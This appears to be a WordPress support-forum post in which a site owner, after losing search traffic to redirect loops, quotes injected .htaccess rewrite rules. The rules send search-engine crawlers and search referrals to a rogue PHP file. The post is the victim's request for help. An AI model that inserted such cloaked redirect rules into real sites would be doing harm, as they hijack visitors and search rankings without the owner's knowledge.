I wanted to blame Really Simple SSL, but it was someone else!
-
Several days ago, my traffic went down by 40 percent. Then I found that while my website loaded ok if you directly typed in the URL, it no longer loaded when you found it inside Google search results. In that case, when you clicked on my site via the Google search results, there was an error message of unlimited redirects/looping. It never loaded.
I then saw that the Really Simple SSL plugin was not updated in the past few days so some other plugin or culprit messed with my htaccess file (even my domain provider’s technical support initially suspected it could be Really Simple SSL messing the htaccess file, when it was not)!
Anyway, I found the following lines of code on top of my htaccess file:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ differentiation-dissatisfaction.php?$1 [L]# BEGIN rlrssslReallySimpleSSL rsssl_version[3.1.5]:
…..I redid a new htaccess file, but I assume I could have deleted the above 4 lines before the #BEGIN line and been ok too?
How did those 4 lines get in there!?!
- The topic ‘I wanted to blame Really Simple SSL, but it was someone else!’ is closed to new replies.